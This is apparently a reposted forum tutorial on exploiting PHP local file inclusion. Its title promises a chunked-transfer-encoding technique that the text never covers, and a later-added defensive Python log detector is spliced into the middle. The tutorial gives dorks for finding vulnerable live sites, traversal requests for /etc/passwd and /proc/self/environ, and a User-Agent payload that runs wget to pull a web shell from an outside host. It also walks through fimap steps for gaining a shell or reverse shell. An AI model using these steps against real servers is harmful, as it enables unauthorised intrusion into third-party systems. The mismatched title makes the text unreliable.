LFI bounce using chunked transfer encoding
Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized and allows directory traversal characters to be injected.
The vulnerable code looks like:
<?php
// Vulnerable on purpose: the 'file' parameter goes straight into include()
// with no sanitisation, so "../" sequences reach the filesystem.
if (isset($_GET['file'])) {
    $file = $_GET['file'];
    include("pages/$file");
} else {
    // ... default page handling ...
}
?>
From the code you can see that it includes a file from the local filesystem, with the file name taken straight from the request.
To find LFI-vulnerable sites, use a dork like: inurl:php?id=*.php
The "*.php" means any file name with the extension .php.
Ex: inurl:php?page=contact.php, contactus.php etc.
Or inurl:.php?file=somefile.php
(* I'm not responsible for any of the actions you take; this is for educational purposes only.)
There are two ways: manual and automated.
MANUAL way for LFI:
/proc/self/environ method:
Check for a vulnerable site as above, then:
Now let's check for /etc/passwd to see if it is vulnerable to Local File Inclusion. Let's make a request:
http://www.website.com/view.php?page=../etc/passwd
We get an error and no /etc/passwd file.
* So we go more directories up:
http://www.website.com/view.php?page=../../etc/passwd
If the file's contents come back (shown as a screenshot in the original post), we successfully included the /etc/passwd file.
Then check for /proc/self/environ (in place of /etc/passwd); we get a message like the one in the original post's screenshot.
Then we need the Tamper Data add-on for Firefox:
Choose Tamper and in the User-Agent field write the following code:
<?system('wget http://site.com/shel.txt -O shel.php');?>
Then submit the request.
(* Here shel.txt must contain the shell code, which we fetch from another site using the wget command.*)
Tada!
Shell uploaded.
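From the defender's side, the technique above leaves two distinct signals in a web server's access log: traversal sequences (or the /etc/passwd and /proc/self/environ paths) inside a query parameter, and PHP code planted in the User-Agent header. The following Python detector is an added example, not part of the original post; the log lines it scans are constructed, and the addresses and host names in them are placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache "combined" log lines (placeholder IPs and hosts).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /view.php?page=../../etc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /view.php?page=../../proc/self/environ HTTP/1.1" 200 2201 "-" "<?system('wget http://example.invalid/shel.txt -O shel.php');?>"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?file=..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2201 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
TRAVERSAL = re.compile(r'(\.\./|\.\.\\)')
SENSITIVE = ('/etc/passwd', '/proc/self/environ')


def analyse_line(line):
    """Return a list of findings for one access-log line (empty if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    # Decode twice so URL-encoded and double-encoded traversal both surface.
    decoded = unquote(unquote(m.group('target')))
    for key, value in parse_qsl(urlsplit(decoded).query, keep_blank_values=True):
        if TRAVERSAL.search(value):
            findings.append(f"traversal in parameter '{key}'")
        for path in SENSITIVE:
            if path in value:
                findings.append(f"read of {path} via '{key}'")
    # The /proc/self/environ trick plants PHP in a request header (User-Agent
    # in the post), so a PHP open tag there is a strong signal on its own.
    if '<?' in m.group('ua'):
        findings.append('php code in User-Agent')
    return findings


def scan_log(text):
    """Map each client IP with suspicious requests to its list of findings."""
    report = {}
    for line in text.splitlines():
        found = analyse_line(line)
        if found:
            report.setdefault(line.split(' ', 1)[0], []).extend(found)
    return report
```

Run against the sample, the first line is clean and the other three are flagged; in practice the same checks apply equally to the Referer and Cookie headers, since any header that ends up in the process environment works for this injection.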
Warning:
I am not responsible for your actions, please be careful. This is for educational purposes only.
--------------------------------------------------------------------------------
Automated:
Now remove the file name in the URL and replace it with "../" (without quotes).
If you get an error like:
Warning: include_once(../) [function.include-once]: failed to open stream: Inappropriate ioctl for device in /home/sitename/public_html/index.php on line 10
Warning: include_once() [function.include]: Failed opening '../' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/sitename/public_html/index.php on line 10
it is vulnerable to LFI.
Now to attack:
You need a Python script called "fimap", which can be downloaded via Google.
You need Python installed to execute it.
Open a command prompt, go to the folder where the fimap.py script is present and type:
"fimap.py -u www.site.com/file.php?page=file.php"
(-u: option to scan whether the vuln exists or not)
It tests for injecting a file where it is vulnerable; the output looks like the screenshot in the original post.
From that pic you can see at the bottom: "[1] /proc/self/environ" 0
(0 - clean/readable, 1 - writable)
Now to exploit, type:
"fimap.py -x www.site.com/file.php?page=file.php"
(-x: exploit; -u: scan for vuln).
Now you will see something like the screenshot in the original post:
Choose domain: here you need to choose a number; my option is "9". The thing here is that fimap stores the history of successful exploitation, so choose the number corresponding to the domain which you have scanned.
After that it asks you again to choose the vulnerable script (choose the number; if there is only one script, type 1).
Then it asks for the type of available attacks. They are:
1. spawn fimap shell
2. pentest monkey reverse shell
Select option 1.
It will successfully inject.
Tada! You get the command prompt of the host.
(As for the pentest monkey shell, you need netcat and an open port to get the connection back.)
Warning:
I am not responsible for your actions, please be careful. This is for educational purposes only.
You will hardly find LFI-vulnerable sites; you need to work your ass off to find them.
--------------------------------------------------------------------------------------------------------